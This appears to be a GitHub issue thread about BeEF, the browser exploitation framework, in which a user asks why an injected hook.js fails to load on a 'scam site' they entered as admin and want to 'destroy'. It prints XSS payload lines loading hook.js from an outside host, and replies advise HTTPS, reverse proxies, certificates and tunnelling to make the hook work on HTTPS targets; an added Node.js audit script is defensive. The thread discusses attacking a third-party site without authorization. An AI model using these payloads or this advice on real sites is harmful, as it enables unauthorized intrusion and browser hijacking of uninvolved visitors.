Why is my hook.js not working on this site?
tieumap opened this issue · 14 comments
Hello guys,
After I installed BeEF, I got xxx:3000/hook.js.
I inserted <script src="http://xxxx:3000/hook.js"></script> into the HTML of my site, then I went to the BeEF panel and it was working well.
But...
Then I found a scam site; I can log in as admin, and it has an XSS vulnerability.
I inserted the script <script src="http://xxxx:3000/hook.js"></script> into a form, and it succeeded, like this.
But when I load the page, my panel still does not show it.
And when I checked the code of the scam site, I got this.
In the head I found this code.
So is that why my hook.js is not working? Right or not?
And how can I fix it? It is a scam site and I want to destroy them.
Thanks so much
You are mixing HTTP and HTTPS content.
BeEF is using HTTP. The hooked website is using HTTPS.
Most modern websites using HTTPS and modern web browsers do not load mixed active content, such as JavaScript, from clear text HTTP websites. To hook HTTP websites, ideally you should set up a frontend reverse proxy or configure BeEF on port 443 with HTTPS enabled and valid certificates.
My site uses HTTPS and it is still working :D but I will try HTTPS.
Well,
I have been using HTTPS but it is still not working!
So it is the scam site blocking hook.js.
You are mixing HTTP and HTTPS content.
BeEF is using HTTP. The hooked website is using HTTPS.
Most modern websites using HTTPS and modern web browsers do not load mixed active content, such as JavaScript, from clear text HTTP websites. To hook HTTP websites, ideally you should set up a frontend reverse proxy or configure BeEF on port 443 with HTTPS enabled and valid certificates.
* https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content#mixed_active_content
* https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content/How_to_fix_website_with_mixed_content
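The mixed active content rule described above, seen from the site owner's side, as an added example that is not part of the original thread: a small Node.js audit that lists every script a page loads, marks the ones a browser would refuse as mixed content, and flags origins outside an allowlist. The page URL, HTML and allowlist are constructed sample values.

```javascript
// Added example (not from the thread): audit <script src> tags on a page.
// Loopback hosts count as trustworthy origins, so they are not mixed content.
const LOOPBACK = new Set(["localhost", "127.0.0.1", "[::1]"]);

// Pull the src attribute out of every <script> tag (a regex is enough for an audit pass).
function scriptSources(html) {
  const re = /<script\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// For each script: would the browser block it as mixed active content,
// and does it come from an origin the site owner did not approve?
function auditScripts(pageUrl, html, allowedOrigins) {
  const page = new URL(pageUrl);
  const allowed = new Set([page.origin, ...allowedOrigins]);
  return scriptSources(html).map((src) => {
    const url = new URL(src, page); // resolves relative paths against the page
    const mixed =
      page.protocol === "https:" &&
      url.protocol === "http:" &&
      !LOOPBACK.has(url.hostname);
    return {
      src: url.href,
      blockedAsMixedContent: mixed,
      unexpectedOrigin: !allowed.has(url.origin),
    };
  });
}

// Constructed sample: an HTTPS admin page whose head contains an injected script tag.
const SAMPLE_PAGE = "https://shop.example/admin";
const SAMPLE_HTML = `
<head>
  <script src="/static/app.js"></script>
  <script src='https://cdn.example/lib.js'></script>
  <script async="" src="http://192.0.2.10:3000/hook.js"></script>
</head>`;
const SAMPLE_ALLOWED = ["https://cdn.example"];

console.log(auditScripts(SAMPLE_PAGE, SAMPLE_HTML, SAMPLE_ALLOWED));
```

A script that is blocked as mixed content never runs, but the injected tag is still evidence of stored XSS, so the `unexpectedOrigin` flag is the finding to act on.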
Interesting, so in order for beef-xss to operate on HTTPS sites we need to set up a front-end reverse proxy, have it run on port 443, have HTTPS enabled, and have valid certificates.
How would I get valid certificates? That's my only question. I assume we would have to generate them ourselves, right? Using what tool?
I just want to know how to set up a reverse proxy.
I need a video on how to make a reverse proxy for BeEF.
Please, can anyone do it and help :(
How would I get valid certificates? That's my only question. I assume we would have to generate them ourselves, right? Using what tool?
Let's Encrypt is popular for free certificates.
Some people like using a tunneling solution such as ngrok instead. This requires a paid account.
So why, when I use ngrok free, do I still get a domain and can access it :D But I want to ask, how long does an ngrok domain keep running? Unlimited time, or 2 days, 2 weeks? Do you know?
So why, when I use ngrok free, do I still get a domain and can access it :D
ngrok detects and blocks abuse of free accounts.
How long does an ngrok domain keep running? Unlimited time, or 2 days, 2 weeks? Do you know?
I do not know. It is limited.
Big mate, I have installed nginx and set up Let's Encrypt.
But can you show me the nginx config file to do that? Yeah, I need that config; without it I cannot run it.
I actually just reported a hook problem, and this might not have anything to do with BeEF. You guys, hear me out: we have two pages running, right, the CentOS Apache page which runs on port 3000 and the Apache page we run on port 80. The CentOS Apache page automatically starts. I haven't checked yet if it's because of BeEF or something else, but this can potentially cause traffic issues, I believe... possibly. I found this out by writing this rule in my chain:
sudo iptables -t nat -I PREROUTING -p tcp -s 192.168.1.9 -j DNAT --to-destination 192.168.1.5:3000
That directs us to our Apache2 CentOS page, so the real question is: how do we disable the Apache2 CentOS page? And why is BeEF auto-starting that page that's causing our hooks to possibly fail?
I'll post pictures, because this auto-start of Apache can be causing issues. They also mentioned something about that in my Network Penetration course with Zaid Security.
Hello guys, after I installed BeEF, I got xxx:3000/hook.js. I inserted <script src="http://xxxx:3000/hook.js"></script> into the HTML of my site, then I went to the BeEF panel and it was working well. But... then I found a scam site; I can log in as admin, and it has an XSS vulnerability.
I inserted the script <script src="http://xxxx:3000/hook.js"></script> into a form, and it succeeded, like this. But when I load the page, my panel still does not show it.
And when I checked the code of the scam site, I got this. In the head I found this code:
<script async="" src="http://34.205.68.184:3000/hook.js"></script>
So is that why my hook.js is not working? Right or not? And how can I fix it? It is a scam site and I want to destroy them. Thanks so much
Read into what I just said, and I'll try to translate if you need me to, man.
That directs us to our Apache2 CentOS page, so the real question is: how do we disable the Apache2 CentOS page? And why is BeEF auto-starting that page that's causing our hooks to possibly fail?
If the web server imitation is confusing you can disable it in the config file.
This issue has been marked as stale due to inactivity and will be closed in 7 days